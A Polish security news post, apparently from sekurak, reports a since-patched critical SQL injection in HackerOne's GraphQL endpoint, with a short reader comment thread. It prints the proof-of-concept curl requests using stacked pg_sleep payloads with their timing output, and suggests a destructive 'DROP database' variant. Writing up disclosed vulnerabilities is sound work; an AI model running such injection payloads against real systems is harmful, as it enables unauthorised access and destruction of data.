Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
Hacker pokazał jak można zhackować serwis dla hackerów (SQLi w hackerone.com).
SQL injection to podatność stara jak SQL i cały czas popularna jak smog w Polsce. Tutaj ciekawy przykład SQLi w serwisie hackerone (krytyczność: 10/10 w skali CVSS).
Podatność istniała w zapytaniu GraphQL:
$ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(5\)%3B--%27 {}curl -X POST 0.03s user 0.01s system 0% cpu 5.726 total $ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(1\)%3B--%27 {}curl -X POST 0.03s user 0.01s system 2% cpu 1.631 total $ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(10\)%3B--%27 {}curl -X POST 0.02s user 0.01s system 0% cpu 10.557 total
Jak widać, wielkiej finezji tu nie ma. Podatne miejsce to (jeszcze raz): embedded_submission_form_uuid=1′;SELECT 1 SELECT pg_sleep(5);–
Działa tutaj średnik, który zamyka poprzednie zapytanie SQL i możemy bez żadnego skrępowania uruchamiać nowe zapytanie, potencjalnie coś w rodzaju.: embedded_submission_form_uuid=1′;DROP database hackerone;–
Podatność została załatana w parę godzin, a dodatkowo przeprowadzono audyt, czy ktoś wcześniej nie wykorzystał luki (nie, nie wykorzystał).
–ms
lol
ciekawe czemu nie dostał bounty :/
Bo hackerone nie ma bugbounty?
Sprawdziles, przed napisaniem komentarza?
jakbym sprawdził to bym nie zadawał pytań, zluzuj rajty, na następny raz będę wiedział ^^